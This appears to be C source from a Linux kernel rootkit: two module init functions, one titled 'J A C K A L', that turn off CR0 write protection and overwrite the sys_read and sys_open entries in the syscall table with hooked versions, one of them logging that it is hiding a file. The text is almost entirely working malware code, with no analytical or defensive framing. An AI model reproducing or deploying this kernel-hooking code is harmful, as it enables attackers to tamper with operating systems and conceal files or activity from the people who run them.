static int __init rootkit_start(void)
{
// Find the syscall table in memory
if(!(sys_call_table = aquire_sys_call_table()))
return -1;
// record the initial value in the cr0 register
original_cr0 = read_cr0();
// set the cr0 register to turn off write protection
write_cr0(original_cr0 & ~0x00010000);
// copy the old read call
ref_sys_read = (void *)sys_call_table[__NR_read];
// write our modified read call to the syscall table
sys_call_table[__NR_read] = (unsigned long *)new_sys_read;
// turn memory protection back on
write_cr0(original_cr0);
return 0;
}
static int __init jackle_start( void ) {
printk( KERN_INFO "[+] J A C K A L\n" );
if( !( sys_call_table = aquire_sys_call_table() ) )
return -1;
original_cr0 = read_cr0();
printk( KERN_INFO " |- Aquired sys_call_table\n" );
write_cr0( original_cr0 & ~0x00010000 );
printk( KERN_INFO " |- Unlocked table!!\n" );
ref_sys_read = ( void * )sys_call_table[__NR_read];
ref_sys_open = ( void * )sys_call_table[__NR_open];
sys_call_table[__NR_read] = ( unsigned long * )new_sys_read;
printk( KERN_INFO " |- Patched sys_read\n" );
sys_call_table[__NR_open] = ( unsigned long * )new_sys_open;
printk( KERN_INFO " |- Patched sys_open\n" );
printk( KERN_INFO " | ` hiding %s\n", file_to_hide );
write_cr0( original_cr0 );
return 0;
}
